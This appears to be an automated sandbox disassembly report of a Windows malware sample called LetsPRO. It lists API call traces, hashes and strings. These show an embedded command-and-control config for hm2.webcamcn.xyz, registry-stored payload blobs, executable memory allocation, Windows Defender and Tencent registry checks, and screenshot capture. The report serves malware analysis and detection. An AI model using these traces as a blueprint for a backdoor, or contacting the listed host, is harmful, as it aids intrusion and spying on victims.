                                        • Instruction ID: a740c129aa4ac43de60c95431df4ee6f5b5e5ad24402f5ccba2943665893edf8
                                        • Opcode Fuzzy Hash: a9c97c26700ec1fb38f1f682dead8b5b38b6e431afc51f242176c2cd91c66951
                                        • Instruction Fuzzy Hash: 2F510872700642AFE751DF69C8C8A6ABBA6FF8431471486ACDA19CB700D731FC41CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,?,004011A7,00000000,?,?,00401054), ref: 0040124F
                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00000000,?,?,?,004011A7,00000000,?,?,00401054), ref: 0040127F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Heap$AllocateProcess
                                        • String ID:
                                        • API String ID: 1357844191-0
                                        • Opcode ID: d18f0155673e6dd6d57614b3c1d18179f393f220fe4cb60c32735651ae6b723f
                                        • Instruction ID: 3a122356888ca125531bc0c5e5f2dd309c0a3efcccc452154f43f17ddaa41462
                                        • Opcode Fuzzy Hash: d18f0155673e6dd6d57614b3c1d18179f393f220fe4cb60c32735651ae6b723f
                                        • Instruction Fuzzy Hash: C4F0C930C4060CEBDB10AFA0FA09AADBF74FF59302F5190A4E944B61A4DB318A34D759
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 025F5E61
                                          • Part of subcall function 025F5D60: lstrlenW.KERNEL32(000012A0,?,?,?,?,?,025F5E77,p1:,0260C6FE,00000000,0260C6E0,00000000,000012A0,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:), ref: 025F5D78
                                          • Part of subcall function 025F5D60: _memset.LIBCMT ref: 025F5D82
                                          • Part of subcall function 025F5D60: lstrlenW.KERNEL32(|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:,?,?,?,?,?,025F5E77,p1:,0260C6FE,00000000,0260C6E0,00000000,000012A0,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:), ref: 025F5D8F
                                          • Part of subcall function 025F5D60: lstrlenW.KERNEL32(?,?,?,?,?,?,025F5E77,p1:,0260C6FE,00000000,0260C6E0,00000000,000012A0,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:), ref: 025F5D97
                                        • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 025F600B
                                        • RegQueryValueExW.KERNEL32(?,IpDate,00000000,00000003,00000000,00000000), ref: 025F6030
                                        • _memset.LIBCMT ref: 025F6048
                                        • RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:,0000000A), ref: 025F6068
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memsetlstrlen$QueryValue$Open
                                        • String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:
                                        • API String ID: 3278200350-2478570363
                                        • Opcode ID: 3b013de37ebe0acb58445a7729a740f8dd8a924fbb14333e18cee4e67b7d05bc
                                        • Instruction ID: 9b6ab85285e8d45f8c69968f17a2209b8f283f05e16d37a04219c4ff88b777f8
                                        • Opcode Fuzzy Hash: 3b013de37ebe0acb58445a7729a740f8dd8a924fbb14333e18cee4e67b7d05bc
                                        • Instruction Fuzzy Hash: FE51E7B5BD130A79F57A72A48C8BF4FBF156B50F01FA40242B707B90C1A9E03605B96E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 025F5507
                                        • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 025F552E
                                        • _memset.LIBCMT ref: 025F5548
                                        • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 025F5563
                                        • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 025F5586
                                        • RegCloseKey.ADVAPI32(?), ref: 025F55B1
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 025F5605
                                        • _memset.LIBCMT ref: 025F5669
                                        • _memset.LIBCMT ref: 025F568D
                                        • _memset.LIBCMT ref: 025F569F
                                        • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 025F5726
                                        • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 025F5799
                                        • RegDeleteValueW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059), ref: 025F57AC
                                        • RegSetValueExW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 025F57C4
                                        • RegCloseKey.ADVAPI32(?), ref: 025F57CE
                                        • Sleep.KERNEL32(00000BB8), ref: 025F57FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                        • String ID: !jWW$.$29e63e83392895a08a0855578b853682$Console\0$_$d33f351a4aeea5e608853d1a56661059$e$i$l${vU_
                                        • API String ID: 354323817-2418287668
                                        • Opcode ID: af45406f133bdae4f98fb0ad5d6bc7ab71d0db88a6369d93a19a27fd1b1604a2
                                        • Instruction ID: c6a224ed21ab0a180ee76d60e705a7387edbfb08d16a7a7cf2c6d55f71af262e
                                        • Opcode Fuzzy Hash: af45406f133bdae4f98fb0ad5d6bc7ab71d0db88a6369d93a19a27fd1b1604a2
                                        • Instruction Fuzzy Hash: 8291B575A40308ABE720DF60DC84FAF7BBAFB85714F508559FA099B244E7B0AA40CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ResetEvent.KERNEL32(?), ref: 025F2D8B
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 025F2D97
                                        • timeGetTime.WINMM ref: 025F2D9D
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 025F2DCA
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 025F2DF6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 025F2E02
                                        • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 025F2E21
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 025F2E2D
                                        • gethostbyname.WS2_32(00000000), ref: 025F2E3B
                                        • htons.WS2_32(?), ref: 025F2E5D
                                        • connect.WS2_32(?,?,00000010), ref: 025F2E7B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                        • String ID: 0u
                                        • API String ID: 640718063-3203441087
                                        • Opcode ID: bc4723113b74d3c7e43063b63e906564508a2dd33b130545ecf3ea1278b13032
                                        • Instruction ID: c3fcf43bb31ba941a4cd2a492d4c3b58903c0dc17b0bbc8eaedeb9c8390ec0b3
                                        • Opcode Fuzzy Hash: bc4723113b74d3c7e43063b63e906564508a2dd33b130545ecf3ea1278b13032
                                        • Instruction Fuzzy Hash: C4612CB1A40304ABE720DFA4DC85FAFB7B9FF48710F504519FA46EB280D7B0A9448B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ResetEvent.KERNEL32(?), ref: 03F32DBB
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 03F32DC7
                                        • timeGetTime.WINMM ref: 03F32DCD
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 03F32DFA
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03F32E26
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03F32E32
                                        • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03F32E51
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03F32E5D
                                        • gethostbyname.WS2_32(00000000), ref: 03F32E6B
                                        • htons.WS2_32(?), ref: 03F32E8D
                                        • connect.WS2_32(?,?,00000010), ref: 03F32EAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                        • String ID: 0u
                                        • API String ID: 640718063-3203441087
                                        • Opcode ID: 369f57328103b545f2b7e6f759b3d14e9afa84d2d98238f4c0798258dad709c5
                                        • Instruction ID: 83cf9b500afa6c0875e48b9d8dae3212bacf25b6904af4948b6f8f178f2f4a58
                                        • Opcode Fuzzy Hash: 369f57328103b545f2b7e6f759b3d14e9afa84d2d98238f4c0798258dad709c5
                                        • Instruction Fuzzy Hash: 83614171A40308BFD720EFA4DC45FABB7B8FF49710F104619F655AB290D6B0A9048B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 03F3AD53
                                        • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03F3AD73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenQueryValue
                                        • String ID: %s_bin$Console$Console\0$IpDatespecial
                                        • API String ID: 4153817207-1338088003
                                        • Opcode ID: 9bff7920ff5176ee05d572e270c384f6160ceb5652a2a0d74f6fee54149ed3f3
                                        • Instruction ID: 0dbec117f6f86b60b6d34db40acdacf11e92a5326b31fa1c0264d73d06e1691e
                                        • Opcode Fuzzy Hash: 9bff7920ff5176ee05d572e270c384f6160ceb5652a2a0d74f6fee54149ed3f3
                                        • Instruction Fuzzy Hash: A2C117B6A00301ABE710EF25DC41F6B73A8EF96714F080568F9899B281E775E905C7A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • CreateMutexW.KERNEL32(00000000,00000000,2024. 4.23), ref: 03F35F66
                                        • GetLastError.KERNEL32 ref: 03F35F6E
                                        • Sleep.KERNEL32(000003E8), ref: 03F35F85
                                        • CreateMutexW.KERNEL32(00000000,00000000,2024. 4.23), ref: 03F35F90
                                        • GetLastError.KERNEL32 ref: 03F35F92
                                        • _memset.LIBCMT ref: 03F35FB9
                                        • lstrlenW.KERNEL32(?), ref: 03F35FC6
                                        • lstrcmpW.KERNEL32(?,03F55328), ref: 03F35FED
                                        • Sleep.KERNEL32(000003E8), ref: 03F35FF8
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 03F36005
                                        • GetConsoleWindow.KERNEL32 ref: 03F3600F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                        • String ID: 2024. 4.23$key$open
                                        • API String ID: 2922109467-1541589875
                                        • Opcode ID: cdde854ffd0bd978984cb919dcebce40d9082dbeb4d2f157c603663406c95274
                                        • Instruction ID: e1ab6f393015a589c853a0f484c3e04fabcecfe9acce613cdb95895b3e6188ab
                                        • Opcode Fuzzy Hash: cdde854ffd0bd978984cb919dcebce40d9082dbeb4d2f157c603663406c95274
                                        • Instruction Fuzzy Hash: 3121297294430AABD614EB74EC45F5E7398EB95700F140929FB08D71D4DB70E609CBA3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • _memset.LIBCMT ref: 03F362CE
                                        • wsprintfW.USER32 ref: 03F36336
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03F3635F
                                        • _memset.LIBCMT ref: 03F36376
                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 03F363B2
                                        • lstrcatW.KERNEL32(03F61F10,?), ref: 03F363CE
                                        • lstrcatW.KERNEL32(03F61F10,03F5535C), ref: 03F363DA
                                        • RegCloseKey.ADVAPI32(00000000), ref: 03F363E3
                                        • lstrlenW.KERNEL32(03F61F10,?,1A93E2E0,00000AD4,00000000,75A773E0), ref: 03F36427
                                        • lstrcatW.KERNEL32(03F61F10,03F553D4), ref: 03F3643B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                        • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                        • API String ID: 1671694837-1583895642
                                        • Opcode ID: ed97aea7e758568ae0504cb0f6c6f54f775ab2b2bc080933109c013d033c79b5
                                        • Instruction ID: f48d14cabe4503200de95d0a381c41eb14f0bfe6fa7ff74e9a188655a0101ea3
                                        • Opcode Fuzzy Hash: ed97aea7e758568ae0504cb0f6c6f54f775ab2b2bc080933109c013d033c79b5
                                        • Instruction Fuzzy Hash: C74172F1A002686EDB24DB94CC91FEEB7B8AB49705F0441C8F74DA7191DA74AA80CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • GlobalAlloc.KERNEL32(00000002,?,1A93E2E0,?,00000000,?), ref: 03F3C09E
                                        • GlobalLock.KERNEL32(00000000), ref: 03F3C0AA
                                        • GlobalUnlock.KERNEL32(00000000), ref: 03F3C0BF
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03F3C0D5
                                        • EnterCriticalSection.KERNEL32(03F5FB64), ref: 03F3C113
                                        • LeaveCriticalSection.KERNEL32(03F5FB64), ref: 03F3C124
                                          • Part of subcall function 03F39DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03F39E04
                                          • Part of subcall function 03F39DE0: GdipDisposeImage.GDIPLUS(?), ref: 03F39E18
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03F3C14C
                                          • Part of subcall function 03F3A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03F3A48D
                                          • Part of subcall function 03F3A460: _free.LIBCMT ref: 03F3A503
                                        • GetHGlobalFromStream.OLE32(?,?), ref: 03F3C16D
                                        • GlobalLock.KERNEL32(?), ref: 03F3C177
                                        • GlobalFree.KERNEL32(00000000), ref: 03F3C18F
                                          • Part of subcall function 03F39BA0: DeleteObject.GDI32(?), ref: 03F39BD2
                                          • Part of subcall function 03F39BA0: EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BE3
                                          • Part of subcall function 03F39BA0: EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BF8
                                          • Part of subcall function 03F39BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03F39B7B), ref: 03F39C04
                                          • Part of subcall function 03F39BA0: LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C15
                                          • Part of subcall function 03F39BA0: LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C1C
                                        • GlobalSize.KERNEL32(00000000), ref: 03F3C1A5
                                        • GlobalUnlock.KERNEL32(?,?), ref: 03F3C221
                                        • GlobalFree.KERNEL32(00000000), ref: 03F3C249
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                        • String ID:
                                        • API String ID: 1483550337-0
                                        • Opcode ID: f0129592601724b0203116e2e765313af7d67884a19683d90bccd563a1c2585a
                                        • Instruction ID: d137d94f97a284ec727f693c550a5b36fef2a0766ac8d191759ac2fc6ad8772e
                                        • Opcode Fuzzy Hash: f0129592601724b0203116e2e765313af7d67884a19683d90bccd563a1c2585a
                                        • Instruction Fuzzy Hash: 2E6127B6D00319EFDB10EFA8D8949AEBBB8FF49710F10452AE915AB341DB70A905CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • _memset.LIBCMT ref: 03F364C2
                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 03F364E2
                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03F36524
                                        • _memset.LIBCMT ref: 03F36560
                                        • _memset.LIBCMT ref: 03F3658E
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75A773E0), ref: 03F365BA
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A773E0), ref: 03F365C3
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A773E0), ref: 03F365D5
                                        • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75A773E0), ref: 03F36625
                                        • lstrlenW.KERNEL32(?), ref: 03F36635
                                        Strings
                                        • Software\Tencent\Plugin\VAS, xrefs: 03F364D8
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                        • String ID: Software\Tencent\Plugin\VAS
                                        • API String ID: 2921034913-3343197220
                                        • Opcode ID: 01f4123ba94e66045e2b16d5bbdcb45cc132cf64e142e72ee2389d2ba863932e
                                        • Instruction ID: b565caf2ff002a2ac45deaf6b777b83ee7f7b66d7236138be17df99b2a56efb1
                                        • Opcode Fuzzy Hash: 01f4123ba94e66045e2b16d5bbdcb45cc132cf64e142e72ee2389d2ba863932e
                                        • Instruction Fuzzy Hash: 9C4196F6E40319BBD724DB54CD85FEAB77CDB45700F004599E709FB041EA70AA858BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03F3A48D
                                        • _malloc.LIBCMT ref: 03F3A4D1
                                        • _free.LIBCMT ref: 03F3A503
                                        • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 03F3A522
                                        • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 03F3A594
                                        • GdipDisposeImage.GDIPLUS(00000000), ref: 03F3A59F
                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 03F3A5C5
                                        • GdipDisposeImage.GDIPLUS(00000000), ref: 03F3A5DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                        • String ID: &
                                        • API String ID: 2794124522-3042966939
                                        • Opcode ID: a08e66f958375e18fbeead37103dfcf7643beedc79a391e108052882001eb2a3
                                        • Instruction ID: b3dd4f5f852ba04f41cb1a02b966bce431a700816cf8fec46e76079efd67deb0
                                        • Opcode Fuzzy Hash: a08e66f958375e18fbeead37103dfcf7643beedc79a391e108052882001eb2a3
                                        • Instruction Fuzzy Hash: 615165B6D00219AFDF04DFA5D844EEEB7B8EF49700F048269E905BB250E774A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 025F5382
                                        • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 025F5392
                                        • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0260C6E0,000012A0), ref: 025F53B0
                                        • RegCloseKey.ADVAPI32(?), ref: 025F53BB
                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 025F540F
                                        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 025F541B
                                        • Sleep.KERNEL32(00000BB8), ref: 025F5434
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                        • String ID: IpDates_info$SOFTWARE
                                        • API String ID: 864241144-2243437601
                                        • Opcode ID: f427f0056ce6c60db36fcc57d1d6b3758b5e5e24fa2710f4e9ceef8eec8103f9
                                        • Instruction ID: fa0febde18390d86305530d2a384e1aa8f97fad7395f040f0870353e8425ee06
                                        • Opcode Fuzzy Hash: f427f0056ce6c60db36fcc57d1d6b3758b5e5e24fa2710f4e9ceef8eec8103f9
                                        • Instruction Fuzzy Hash: 4F4129316942819BD3528F388889F7F7FA5BB45304FD81949E782D61C2F7B0E842D79A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 025F5382
                                        • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 025F5392
                                        • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0260C6E0,000012A0), ref: 025F53B0
                                        • RegCloseKey.ADVAPI32(?), ref: 025F53BB
                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 025F540F
                                        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 025F541B
                                        • Sleep.KERNEL32(00000BB8), ref: 025F5434
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                        • String ID: IpDates_info$SOFTWARE
                                        • API String ID: 864241144-2243437601
                                        • Opcode ID: a725eaf4e8d3ca759e193c804b6c161ad4a759a816cedef46f7f01e9d5725155
                                        • Instruction ID: 439c99d969a6f44ddc82f41d33703acf9bad45b8b81c3d6d129d336ff15158ca
                                        • Opcode Fuzzy Hash: a725eaf4e8d3ca759e193c804b6c161ad4a759a816cedef46f7f01e9d5725155
                                        • Instruction Fuzzy Hash: E131C5306942819BD7528F388888F7F7FE5BB45304FD81848F3869A182E7A0E946DB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,03F512F8,1A93E2E0,00000001,00000000,00000000), ref: 03F3CAB1
                                        • RegQueryInfoKeyW.ADVAPI32(03F512F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 03F3CAE0
                                        • _memset.LIBCMT ref: 03F3CB44
                                        • _memset.LIBCMT ref: 03F3CB53
                                        • RegEnumValueW.KERNEL32(03F512F8,?,00000000,?,00000000,?,00000000,?), ref: 03F3CB72
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                          • Part of subcall function 03F3F707: std::exception::exception.LIBCMT ref: 03F3F756
                                          • Part of subcall function 03F3F707: std::exception::exception.LIBCMT ref: 03F3F770
                                          • Part of subcall function 03F3F707: __CxxThrowException@8.LIBCMT ref: 03F3F781
                                        • RegCloseKey.ADVAPI32(03F512F8,?,?,?,?,?,?,?,?,?,?,?,00000000,03F512F8,000000FF), ref: 03F3CC83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                        • String ID: Console\0
                                        • API String ID: 1348767993-1253790388
                                        • Opcode ID: 32386ea16538fcc9578888da7adb01dfbba68c1f855f3809c0a0dd4955958700
                                        • Instruction ID: c432f64074794842a0d9593eaf9e563a11676473fa7bddeae6c88e72fab4b28d
                                        • Opcode Fuzzy Hash: 32386ea16538fcc9578888da7adb01dfbba68c1f855f3809c0a0dd4955958700
                                        • Instruction Fuzzy Hash: DE611DB5D01219AFDB04DFA8DC80AAEB7B8FF49310F14466AE915EB245D774A901CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 025F7654: __fassign.LIBCMT ref: 025F764A
                                        • Sleep.KERNEL32(00000000), ref: 025F614C
                                          • Part of subcall function 025F6FF7: _malloc.LIBCMT ref: 025F7011
                                        • Sleep.KERNEL32(00000000), ref: 025F62B1
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 025F62FD
                                          • Part of subcall function 025F2C50: WSAStartup.WS2_32(00000202,?), ref: 025F2CAF
                                          • Part of subcall function 025F2C50: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 025F2CBA
